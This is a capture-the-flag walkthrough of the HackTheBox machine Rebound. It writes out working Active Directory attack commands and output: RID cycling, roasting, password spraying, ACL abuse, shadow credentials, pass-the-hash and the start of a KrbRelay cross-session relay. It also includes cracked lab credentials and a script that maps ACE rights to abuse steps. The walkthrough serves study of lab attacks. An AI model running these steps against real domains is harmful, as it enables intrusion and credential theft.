HackTheBox Rebound [RID cycling + AS-REP-Roasting with Kerberoasting + Weak ACLs + ShadowCredentials attack + cross-session relay + Runascs and KrbRelay read gMSA password + Resource-Based Constrained Delegation (RBCD) + S4U2Self & S4U2Proxy]

Summary

This post covers the domain-penetration part of the Insane-rated HTB machine Rebound. Its distinguishing steps are RID cycling, AS-REP roasting combined with Kerberoasting, weak ACLs, the ShadowCredentials attack, cross-session relay, reading a gMSA password with RunasCs and KrbRelay, Resource-Based Constrained Delegation (RBCD), and S4U2Self/S4U2Proxy. It mainly follows 0xdf's Rebound walkthrough and HTB's official Rebound writeup; the notes are recorded here to consolidate understanding and as a reference for later study.

Information gathering

nmap -p- --min-rate 10000 10.10.11.231

PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49681/tcp open unknown
49688/tcp open unknown
49724/tcp open unknown
55738/tcp open unknown

nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.10.11.231

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-17 23:09:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:51+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:50+00:00; -2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:51+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-03-17T23:11:50+00:00; -2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/17%Time=65F77824%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

LDAP (389) and LDAPS (636) are open, together with Kerberos (88), SMB (445) and the global catalog ports (3268/3269), and the certificate and LDAP banner name the host dc01.rebound.htb: this is clearly a Windows domain controller for the rebound.htb domain.

RID cycling

First, try listing SMB shares anonymously:

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2540]
└─[$] smbclient -L \\\\10.10.11.231\\ [20:23:17]
Password for [WORKGROUP\root]: anonymous

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.231 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Only the Shared share is accessible, and it is empty. Since anonymous (null-session) login works, try enumerating users with Impacket's lookupsid.py, which brute-forces the security identifiers (SIDs) of existing principals over the LSARPC named pipe. It does so by cycling through relative identifiers (RIDs); each RID is appended to the domain SID to form a full SID, which the DC is asked to resolve to a name. From the reference documentation:

For domain accounts, the SID of a security principal is created by concatenating the SID of the domain with a relative identifier (RID) for the account.

Run impacket-lookupsid with an arbitrary username in front of the target IP address:

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2541]
└─[$] impacket-lookupsid nan@10.10.11.231 -no-pass [20:24:28]
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)

Only a few users come back, because impacket-lookupsid caps the RID at 4000 by default. Raising the limit to 10000 and running it again returns users with RIDs up to 7687, a much larger sample of usernames. Save every SidTypeUser entry to a file for later use:

impacket-lookupsid nan@10.10.11.231 10000 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > usernames.txt

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2542]
└─[$] cat usernames.txt [20:32:18]
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

AS-REP-Roasting with Kerberoasting

Now try to identify users vulnerable to AS-REP roasting. The weakness arises when an account is configured not to require Kerberos pre-authentication: anyone can then request a ticket-granting ticket (TGT) for that user without knowing the password, and the AS-REP's encrypted part, which is protected with a key derived from the user's password, can be cracked offline.

Impacket's GetNPUsers.py retrieves such AS-REPs for users that have the UF_DONT_REQUIRE_PREAUTH flag set:

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2543]
└─[$] impacket-GetNPUsers -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231 [20:34:38]
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:95d51957aa3771dacc1664c6236c4055$d434f84d1d47433e95073960ed2980c385ae8f830686ef69bc2c0d9b23e197a2901986f89105ff750b722e9cb7086ad9d13c924e41e182cc4e8e0e646838397aa50e33c6356b24f860b4791cdaec04d57bc3f2734ab7749e42073aadfb097ea24a55dd4ae56f68d7f8cba78d1cdb8dcbeedb63f6c11dd6a813d6729a8c76666d9ff687a06b84fb1e6abdb4b92c9b372f44f0c8682f3f36dec2118efa0b81952041c2d180a8ebe0c77d47ea5da4344d1897d1f5b3b92e1618a39ebb94c0e55c457f84d5952f226890e2b1091dc656eb1e1ff16cbf4bb5a288683ea55e64c9491212260953e3574dfd0b9b
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

jjones returns an encrypted AS-REP (the KDC_ERR_CLIENT_REVOKED line belongs to krbtgt, which is disabled). Unfortunately, the hash does not appear to be crackable.

The recent post New Attack Paths? AS Requested Service Tickets shows that an AS-REP-roastable user can be used to Kerberoast without pre-authentication:

However, for Kerberoasting, access to the session key is not needed. Only the resulting ST is required, or more precisely the encrypted part of the ST, which is not protected with the requesting account's key. Therefore, if any account is configured not to require pre-authentication, Kerberoasting is possible without any credentials.

Support for this attack was submitted in Support for Kerberoasting without pre-authentication and ST request through AS-REQ #1413 and has been merged into Impacket's main branch, but at the time of writing it had not shipped in a release. A fork of Impacket that supports this attack (and some other operations needed later in this post) is therefore used; all Impacket-related commands below run with this version of the tools.

python3 -m venv impacket-fork
source ./impacket-fork/bin/activate
git clone https://github.com/ThePorgs/impacket.git
cd impacket
python3 setup.py install

Now GetUserSPNs.py's -no-preauth option can request service tickets for every name in the user list: each request is an AS-REQ sent in jjones's name, with the target account as the service name, so no TGT and no password are needed:

(impacket-fork) [root@kali ~ ]$ GetUserSPNs.py -no-preauth jjones -request -usersfile /root/hackthebox/machine/rebound/usernames.txt rebound.htb/ -dc-ip 10.10.11.231
/root/impacket-fork/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'GetUserSPNs.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$b7f4495dad8442753f659146$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
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$676eaed2d439c42a6527e613$edbd46f85fd04d663029ae0f38a60b6c4387f102e74f1c6f7afb3bcf7cfaf403315e95c3d44cfe92ad358163b825a5ec208914a3c57de024598f67a0e22c81cc12503d0d3d5c30d0af43fd829bad743551438c0ba471470f87f1d0d9b0f3679f5579698d805d16042bcf109d7eda65e2f7d11f82fb62fef7e437dc9a9f26ea6043475bab07bdc9f6ddd824550085b1fc4dfa5b8751efabf603c8b435f76c598cc492e0d01915068ea6137ada5233bd8446e81878206f757c1562e71ff7821c546a81117a5b7a0af14092f392d652c480236cc0c88a35dbe34ca858c5150756d6d75035265124659f99e107776d976b7b9cc93d1b6deba493c20e7782ce69f12a344b0559ba2a0db7a2febe7da4daa6d90f36f97250ce16191a758ee264a7c16803baafe2f767724c0f7c87525378ab80f7c63fdcf2ea6b27e1a7b7c774597f56efc798443e280621eb7506b12a54ece0cbca159f301767c76d97503b87c9a448d846901cbff3d2d28377b91a979e5349a591f11f23420853cd328b7446d13c60b1eeb701711fbe10cadbc13c6a35f5eed5de082adc6f2d20a4a7843c777a6709747c13bedaa1f3324bfce2f3593b3190c39afcce51426f8a1eff6c773d0100388505cffb856c083ece4f6331d06d1a57124bf220b639ac2c2dda020fc164845f9e53a529c7e135cdcfca76952b7ea35a463a04087f9af87e0fa025e033d3c986736c44dfa2f380b865e0ff970ad40abe53b9c8f1e166a7feea936fa9ff886217e50f8f8b4a55fc01bf26914c419adec47233c47a9bcf851aaf0c1f9c2e345459fe5ab037d6cbe457ff89e215ff91b8777b5e39422c5a884746e3176711897dae50f7ef0ccb6ff68ee602bf12902a2fb498f5e83196f9e1f9b07670c3264c2cd86161190e74563acd4140f2423b40a7436a0660338613796562de436a7a8445d5bdc5916873da5368749e9562317ff6f11e984b785a6dd96033270955599b0cd07cd6056a8ae4ae2a77402066306feed7280f063e7917df669a6abad3dec14ad87251a1145a6c3b3db3d4eb9e889846bc3a8daa27eac9dd0c144f90de20b6c258f47321bf7505bc290d0d4d719ff2438fd3b123dcaaa2be8f57e8d0596a11cc0b4f0e91c2950daf39a4cf712f40f23c9506cee7000b8a3ed18002d79b0abe23c26e3a4ac586f5a9f075f8e7ea41e8d0f3c51aae863c6ecdcbb46442f8283d8c8e9e30dbb975024b1ccf485fa537e970945f9600230b7cc794cdd395efa6c2ebd270f8a60af6aaa4a1c6403dd42286ea15a3d80b7e810628cdb8f75783fecc0493218fc934ae89f0687cac4e09982d8e5716a30c05e67986892448f2528d3dd6291c282e82db4a13192
4e6
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$20941b976672bf739ab097ba01a8cfae$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
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$6cab342633ff628cfcfac8c4$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

The command succeeds and produces several tickets, including ones for ldap_monitor and delegator$. The DC01$, krbtgt and delegator$ tickets are assumed to be uncrackable: those accounts have long random passwords, and the $krb5tgs$18$ prefix shows their tickets use AES (etype 18). The ldap_monitor ticket is RC4 ($krb5tgs$23$), so the effort goes there.

Save it to a file and feed it to john:

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2556]
└─[$] john hash --show [20:59:33]
?:1GR8t@$$4u

1 password hash cracked, 0 left

Bloodhound & Powerview

Use bloodhound.py to enumerate the target AD environment remotely. Adjust the collection methods (-c) to exclude ObjectProps, which seemed to make the tool fail.

BloodHound's intricacies are beyond the scope of this post, but are covered in HTB's Active Directory BloodHound module.

bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231

BloodHound did not reveal much, but it did show that ServiceMgmt has GenericAll on the Service Users organizational unit (OU), which can lead to a Descendant Object Takeover (DOT).

First, however, a way to become a member of that group, or to compromise a user in it, is needed.
Use powerview.py for further enumeration.

This reveals that LDAP channel binding is set to "Always", so the server drops any connection from a client that does not supply a channel-binding token. This affects every query against LDAP/LDAPS.

Work around the constraint by authenticating with Kerberos via the -k flag.

  • Make sure the system clock is synchronized with the server's, so that Kerberos works:
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2557]
└─[$] ntpdate rebound.htb [20:59:52]
2024-04-06 04:17:13.7079 (-0500) +25202.758727 +/- 0.127430 rebound.htb 10.10.11.231 s1 no-leap
CLOCK: time stepped by 25202.758727
┌─[root@kali] - [~/hackthebox/machine/rebound] - [2558]
└─[$] powerview rebound.htb/ldap_monitor:'1GR8t@$$4u'@dc01.rebound.htb -k [4:17:13]
Logging directory is set to /root/.powerview/logs/rebound.htb-dc01.rebound.htb
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity Servicemgmt
...
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
...

With the Self right (AccessMask 0x8, the validated-write bit, which on a group object means Self-Membership), oorend can add himself to the group. There are no credentials for this user yet, but ldap_monitor's password can be sprayed across the user list with netexec in the hope that it is reused.

pipx install git+https://github.com/Pennyw0rth/NetExec

λ ~/hackthebox/machine/rebound/ netexec smb dc01.rebound.htb -u usernames.txt -p '1GR8t@$$4u' --continue-on-success
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE

The password is reused by oorend, which means oorend can now add himself to the group.

Back to powerview, this time as oorend.

┌─[root@kali] - [~/hackthebox/machine/rebound] - [2559]
└─[$] powerview rebound.htb/oorend:'1GR8t@$$4u'@dc01.rebound.htb -k [4:24:53]
Logging directory is set to /root/.powerview/logs/rebound.htb-dc01.rebound.htb
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-04-06 04:25:11] User oorend successfully added to servicemgmt

Descendant Object Takeover

After adding oorend to ServiceMgmt, the account has GenericAll (also known as FullControl) on the Service Users OU. That permits writing an inheritable ACE on the OU so that FullControl propagates to every object inside it. Here those objects are winrm_svc and batch_runner:

To carry out the attack, use dacledit.py, which is also packaged in the Impacket fork installed earlier.

With the -inheritance flag, the ACE is written with inheritance so the privilege extends to the child objects:

(impacket-fork) [root@kali ~ ]$ dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -k -dc-ip 10.10.11.231 -action write -rights FullControl -inheritance -principal oorend -target-dn "OU=Service Users,DC=rebound,DC=htb" -use-ldaps
/root/impacket-fork/bin/dacledit.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'dacledit.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240406-043124.bak
[*] DACL modified successfully!
  • Note: if an INSUFF_ACCESS_RIGHTS error appears at this stage, make sure oorend is still a member of ServiceMgmt; the box's cleanup task may have reset the membership.

Checking the ACL of winrm_svc or batch_runner in powerview shows that oorend now has FullControl (GenericAll) on both objects, through an inherited ACE:

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-ObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
ObjectDN : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7684
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
ActiveDirectoryRights : FullControl
AccessMask : 0xf01ff
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
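The two masks shown by powerview, 0x8 on the ServiceMgmt group and 0xf01ff on the inherited winrm_svc ACE, can be read without a tool. The script below is an added example, not code from the writeup or from powerview.py: it maps an ACE AccessMask onto the right names that .NET, powerview and BloodHound use and lists the abuse primitive each grants. The primitive descriptions are a summary, and the object_type parameter is an assumed simplification (the name of an object-specific ACE's ObjectType GUID rather than the GUID itself; None means the ACE covers the whole object, as in the output above, which shows no ObjectType).

```python
"""Decode an Active Directory ACE AccessMask into named rights.

Added example: this is not code from the writeup or from powerview.py. Bit
values are the ADS_RIGHT_* constants (MS-ADTS 5.1.3.2), named the way .NET's
ActiveDirectoryRights, powerview and BloodHound name them.
"""
from typing import List, Optional

ADS_RIGHTS = {
    0x00000001: "CreateChild",
    0x00000002: "DeleteChild",
    0x00000004: "ListChildren",
    0x00000008: "Self",           # validated write; on a group object this is Self-Membership
    0x00000010: "ReadProperty",
    0x00000020: "WriteProperty",
    0x00000040: "DeleteTree",
    0x00000080: "ListObject",
    0x00000100: "ExtendedRight",  # control access right, e.g. User-Force-Change-Password
    0x00010000: "Delete",
    0x00020000: "ReadControl",
    0x00040000: "WriteDacl",
    0x00080000: "WriteOwner",
    0x00100000: "Synchronize",
    0x10000000: "GenericAll",     # generic bits; the DC maps them onto the specific ones
    0x20000000: "GenericExecute",
    0x40000000: "GenericWrite",
    0x80000000: "GenericRead",
}
SELF, EXTENDED_RIGHT = 0x00000008, 0x00000100
WRITE_DACL, WRITE_OWNER = 0x00040000, 0x00080000
GENERIC_ALL_BIT, GENERIC_WRITE_BIT = 0x10000000, 0x40000000
FULL_CONTROL = 0x000F01FF   # .NET GenericAll once mapped: every object right plus Delete/ReadControl/WriteDacl/WriteOwner
GENERIC_WRITE = 0x00020028  # .NET GenericWrite: ReadControl | WriteProperty | Self


def decode_mask(mask: int) -> List[str]:
    """Names of every right bit set in the mask, lowest bit first."""
    return [name for bit, name in sorted(ADS_RIGHTS.items()) if mask & bit]


def is_full_control(mask: int) -> bool:
    return bool(mask & GENERIC_ALL_BIT) or (mask & FULL_CONTROL) == FULL_CONTROL


def abuse_primitives(mask: int, object_type: Optional[str] = None) -> List[str]:
    """Well-known abuse primitives the mask grants over the target object.

    object_type is an assumed simplification: the name of the ObjectType GUID of
    an object-specific ACE, or None when the ACE covers the whole object.
    """
    out = []
    if is_full_control(mask):
        out.append("GenericAll: shadow credentials, password reset, RBCD, inheritable DACL write on an OU")
    elif mask & GENERIC_WRITE_BIT or (mask & GENERIC_WRITE) == GENERIC_WRITE:
        out.append("GenericWrite: write msDS-KeyCredentialLink, servicePrincipalName or logon script")
    if mask & WRITE_DACL:
        out.append("WriteDacl: grant yourself GenericAll")
    if mask & WRITE_OWNER:
        out.append("WriteOwner: take ownership, then rewrite the DACL")
    if mask & SELF and object_type in (None, "Self-Membership"):
        out.append("Self: add yourself to the group (Add-DomainGroupMember)")
    if mask & EXTENDED_RIGHT and object_type in (None, "User-Force-Change-Password"):
        out.append("ExtendedRight: force a password reset")
    return out


if __name__ == "__main__":
    for label, mask in (("ServiceMgmt ACE for oorend", 0x8), ("winrm_svc inherited ACE", 0xF01FF)):
        print(f"{label}: {mask:#x} -> {', '.join(decode_mask(mask))}")
        for hint in abuse_primitives(mask):
            print("   ", hint)
```

Running it on the two masks reproduces the chain used here: 0x8 gives only Self-Membership (add yourself to ServiceMgmt), while the inherited 0xf01ff gives the full set, which is why a ShadowCredentials write works next.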

With FullControl, perform a ShadowCredentials attack against winrm_svc, since the name suggests the account can WinRM into the box. Certipy's shadow auto adds a key credential to the account's msDS-KeyCredentialLink, obtains a TGT with the matching certificate via PKINIT, extracts the NT hash from it, and then restores the original attribute value:

λ ~/hackthebox/machine/rebound/ certipy-ad shadow auto -u oorend@rebound.htb -p '1GR8t@$$4u' -account winrm_svc -target dc01.rebound.htb -dc-ip 10.10.11.231 -k
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9f14b32c-1290-2a13-ef11-ae83e76fe810'
[*] Adding Key Credential with device ID '9f14b32c-1290-2a13-ef11-ae83e76fe810' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '9f14b32c-1290-2a13-ef11-ae83e76fe810' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

With the NT hash retrieved, use it to get a shell on the box via pass-the-hash over WinRM:

evil-winrm -i dc01.rebound.htb -u winrm_svc -H 4469650fd892e98933b4536d2e86e512

cross-session relay

Inspecting the processes running on the system reveals several tasks in session 1 (the SI column), which suggests another user is logged on to the box.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
385 32 12032 20824 2576 0 certsrv
462 18 2348 5588 392 0 csrss
267 16 1968 5168 516 1 csrss
361 15 3440 14940 5164 1 ctfmon
400 33 16388 25152 2652 0 dfsrs
158 8 1944 6356 2784 0 dfssvc
285 14 3992 13876 3756 0 dllhost

An authenticated user on the system opens the target up to a cross-session attack. Upload the toolkit for this task, namely KrbRelay and RunasCs.

RunasCs ships precompiled executables in its GitHub releases, but KrbRelay does not. The project must be downloaded and compiled on a Windows machine, which is beyond the scope of this post. Make sure to use the latest version, which includes NTLM cross-session support.

Using RunasCs, confirm that someone is logged on by running qwinsta:

.\RunasCs.exe oorend '1GR8t@$$4u' -l 9 "qwinsta"

SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console tbrady 1 Active

Combining RunasCs and KrbRelay, an authentication from tbrady's session can be coerced, which yields an NTLMv2 response to crack.

For this, specify NTLM authentication with -ntlm, the session number with -session, and the CLSID of a valid RPC service with the right permissions, chosen from the defaults listed in the README (under Cross-Session Relay, for Windows Server 2019).

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ./RunasCs.exe oorend '1GR8t@$$4u' -l 9 "c:\users\winrm_svc\documents\KrbRelay.exe -ntlm -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10246"
[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
